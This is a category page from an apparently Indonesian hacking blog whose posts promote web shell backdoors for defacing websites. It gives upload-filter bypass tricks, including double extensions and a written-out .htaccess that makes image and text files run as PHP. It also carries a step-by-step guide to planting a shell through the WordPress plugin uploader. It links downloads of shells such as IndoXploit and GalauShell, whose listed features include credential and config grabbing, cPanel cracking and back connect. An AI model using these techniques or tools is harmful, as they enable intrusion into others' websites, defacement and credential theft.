Infinite Haxor: Shell Backdoor

News Ticker

Latest Posts
Browsing Category "Shell Backdoor"

Trik Cara Bypass Extensions ( Ekstensi ) Shell Backdoor Deface

- No Comments


Mungkin dari kalian sering menjumpai web target yang sudah mendapatkan admin akses nya tapi gagal upload backdoor, salah satunya karena web target menolak upload file yang berektensi .php , nah disini ada sedikit trik untuk Bypass nya.


Dengan Rename nama Backdoor.

1.Upload shell berekstensi shell.jpg.PhP
Ingat, bukan .php tapi .PhP . Kadang server bingung dan akan di accept sebagai file .jpg , tapi ketika di eksekusi tetap akan terbaca file php.

2.Upload shell berekstensi shell.php;.jpg
Biasanya sih , server akan mengabaikan ekstensi setelah tanda " ; " sehingga file akan tetap terbaca .php

3.Upload shell berekstensi shell.php.test
Biasa nya ekstensi .test akan diabaikan , sehingga akan tetap dibaca sebagai file .php
4.Upload shell berekstensi shell.php.xxxjpg
ekstensi tidak jelas semacam .xxxjpg biasanya akan diabaikan server, dan akan dibaca sebagai file .php

5.Upload shell dengan ekstensi shell.php5 / php3
Biasanya cara ini yang jadi jurus pamungkas jika keempat cara diatas gagal. Kebanyakan server tetap akan mengeksekusi nya sebagai file .php

Dengan .htaccess
Cara nya sangat simple Upload file .htaccess di bawah ini di web target,  setelah itu upload shell kalian dengan ektensi png, jpg atau txt, Nantinya file .txt , png, dan jpg akan di baca oleh web server menjadi file php

AddType application/x-httpd-php .Arpns1986x
AddType application/x-httpd-php .jpg
AddType application/x-httpd-php .png
AddType application/x-httpd-php .txt


Sampai disini dulu tutorialnya, tutorial selanjutnya menyusul, selengkapnya kalian praktekin sendiri, dan maaf jika ada kesalahan kata , Happy Hacking

Download Indoxploit Shell Backdoor First Version V.2 - Terupdate

- No Comments

Apa Itu Shell ?

Backdoor atau "pintu belakang", dalam keamanan sistem komputer, merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya).

Backdoor juga bisa dibilang jalan alternatif  untuk masuk ke sebuah sistem tanpa diketahui oleh operator sistem. Backdoor biasanya dibuat untuk jaga-jaga kalau saja pintu masuk utama ke dalam sistem error. Backdoor juga bisa dibuat diluar sistem, biasanya para peretas yang membuatnya, supaya dapat mengakses data sistem tanpa memasuki pintu utama sistem. 

Beberapa pengembang perangkat lunak menambahkan backdoor ke dalam program buatannya untuk tujuan merusak (atau tujuan yang mencurigakan). Sebagai contoh, sebuah backdoor dapat dimasukkan ke dalam kode di dalam sebuah situs belanja online (e-commerce) untuk mengizinkan pengembang tersebut memperoleh informasi mengenai transaksi yang terjadi antara pembeli dan penjual, termasuk di antaranya adalah kartu kredit.

Istilah backdoor sekarang digunakan oleh hacker-hacker untuk merujuk kepada mekanisme yang mengizinkan seorang peretas sistem dapat mengakses kembali sebuah sistem yang telah diserang sebelumnya tanpa harus mengulangi proses eksploitasi terhadap sistem atau jaringan tersebut, seperti yang ia lakukan pertama kali.

# IndoXploit Shell First Edition [ V.2 ]

Login Shell Default : IndoXploit
Download Raw indoxploit.phphttps://gist.github.com/khaibar45/f47e9bd22f244fe6cb3e39b98a3f1b64

Fitur:

# K-RDP Shell
-> Fitur untuk membuat Akun RDP yang dapat digunakan hanya di Windows server.

# Back Connect

# CPanel/FTP Auto Deface:

-> Memakai alur ftp_connect, hanya memanfaatkan kesamaan password cpanel & ftp saja.

# Config Grabb :

-> Popoji CMS
-> Voodoo CMS
-> Wordpress
-> Joomla
-> Drupal
-> Magento
-> Ellislab Devteam [CI]
-> Opencart
-> Prestashop
-> phpBB
-> Lokomedia
-> Sitelook
-> Bosweb
-> WHMCS
-> Cpanel

#Jumping [error fixed] :
#Jumping hpshere & Jumping /var/vhosts [ updated ]

-> Kelebihannyaa bisa langsung ambil nama domainnyaa :
-> Cpanel Crack [blank user/pass fixed]:

Fitur ini udah otomatis Grab Passwordnyaa dan juga otomatis mengambil info domain nya, ikutin saja petunjuknya .
SMTP Grabber :
Hanya mengambil info smtp joomla yg ada di config.
Auto edit user / MPC :
Udah otomatis edit seluruh user admin dari config , Tetapi Hanya beberapa cms Tertentu Saja

-> Disetiap tools tertentu ada "NB" ikutin petunjuknya sajaa.

Terkait :

- Idx Shell 
- Idx Shell V.3 
- Idx Shell V.2 
- Download Shell Idx Terbaru 
- Download Shell Backdoor Indoxploit 
- Indoxploit Shell 
- idx.php 
- Shell Backdoor Keren
- Download Shell php
- Shell Backdoor

Download Hidden Uploader Shell Terbaru Untuk Deface

- No Comments

Apa Itu Hidden Uploader ?

Hidden Uploader Pastinya Sudah Diketahui Oleh Banyak Defacer Indonesia Kegunaannya Adalah Untuk Mengupload Script Deface Bahkan Shell Backdoor .

Baca Juga :

Untuk Apa Hidden Uploader ?

Untuk Para Defacer Yang Agak Susah Mengupload Langsung Filenya Di Web Target , Salah Satu Alasannya Web Tersebut Tidak Bisa Di Upload Dengan Format .php Tetapi Bisa Dengan .phtml .

Hidden Shell Ini Support File Dengan Extense .php, .php4, .php5 , Bahkan .phtml .

Baca Juga :

Jangan Lupa Persiapkan Shell Backdoornya, Download Shell Backdoor Disini Dan Script Defacenya Disini

Berikut Tampilan Hax0r Hidden Shell Backdoor Uploadernya :



Download Hax0r Hidden Shell Uploader Dibawah Ini :



Server 1
Server 2

Setelah Berhasil Upload Ke Web target, Cara Membuka File Hidden Uploadernya Tambahkan ?infinite=haxor

> Contoh
http://www.target.co.li/namafile.php?infinite=haxor

Jangan Lupa Share , Komentar & Follow Blog Kami .

Tutorial Upload Shell Di CMS Wordpress

- No Comments


WordPress adalah sebuah aplikasi sumber terbuka (open source) yang sangat populer digunakan sebagai mesin blog (blog engine). WordPress dibangun dengan bahasa pemrograman PHP dan basis data (database) MySQL. PHP dan MySQL, keduanya merupakan perangkat lunak sumber terbuka (open source software). Selain sebagai blog, WordPress juga mulai digunakan sebagai sebuah CMS (Content Management System) karena kemampuannya untuk dimodifikasi dan disesuaikan dengan kebutuhan penggunanya.


Sementara Backdoor atau "pintu belakang", dalam keamanan sistem komputer, merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya)

Langsung To The Point :

1. Target Kalian Yang Sudah Bisa Login Ke WP-Admin Login .

2. Lalu cari Dan Pilih Plugins > Add New  > Upload Plugins > Pilih Shell > Install Now (Lihat Gambar Step by Step)


Jika Belum Punya Shell Download Shell Backdoor Ini 


  • Step 1
Klik Plugins > Add New , Kalian Akan Dialihkan Ke Upload Shell ,Klik Gambar Agar Jelas :



  • Step 2

Klik Upload Lalu Upload Shell Yang Udah Kalia Siapkan. 

Baca Juga :



  •  Step 3
Setelah Berhasil Selesai Upload , Disini Tinggal Isi FTP User & Password .


4. Lalu Ke Media > Library Dan Klik Shell Kalian > Buka Url (Lihat Gambar Step by Step)


  • Step 1
Klik 2x


  • Step 2
Salin Url , Isi Description Terserah



  •  SUKSES 
Buka Url Yang Sudah Kalian Salin Di New Tab :



Kalau Shell Kalian Mengalami DIR Merah Pada CMS Wordpress Kalian Bisa Lihat Cara Lain Mengatasi Jumping DIR Merah [CMS WORDPRESS]

Jika Kurang Paham Dengan Tutor Di Atas , Silahkan Liat Video Ini :

                                   

Download Shell Backdoor Deface Keren Fitur Lengkap - Terbaru

- No Comments

  • Apa Itu Shell ?


Shell, seperti namanya yaitu Shell yang berada dalam Web. Web Shell ini adalah sekumpulan script, yang dapat mengeksekusi perintah shell. Seperti yang terkenal saat ini adalah C99, r57, bypass, dan masih banyak lagi.

Kali ini saia membuat D4RK FR13NDS SHELL (Recode Shell Wso)
Cocok untuk melakukan Backconnect (rooting server)
Oke Langsung Sadja ini Tampilannya

Jika Ingin Belajar Lebih Banyak Tentang Rooting Server Baca Disini Cara Rooting Server With Ngrok
Tampilan Shell


Download Dibawah :

Download Shell Backdoor : Released GalauShell v.1

- No Comments

Baca Juga :

Recode ini sadja
GalauShell v1 Release
Fitur: 
- Upload :v
- Command 
- Mass Deface 
- Mass Delete 
- Config 
- Jumping 
- Bypass 
- CPanel Crack 
- SMTP Grabber 
- Zone-H 
- CGI Telnet 
- network 
- Adminer 
- Fake Root 
- Auto Edit User 
- Auto Edit Title WordPress  
-WordPress Auto Deface 
- WordPress Auto Deface V.2 - WordPress Brute Force  
- CPanel/FTP Auto Deface 
- K-RDP Shell 
- ElFinder Auto Exploiter 
- Hash 
- Database Dump 

Shell ini terlihat seperti acak²an 
Tetapi ya seperti itulah hati ane kalau sedang galau :v


Link Zippyshare :


Atau 4shared

Default Password : galau

Mau mengembangkan?

Silahkan :)

Asalakan jangan lupa sumbernya :)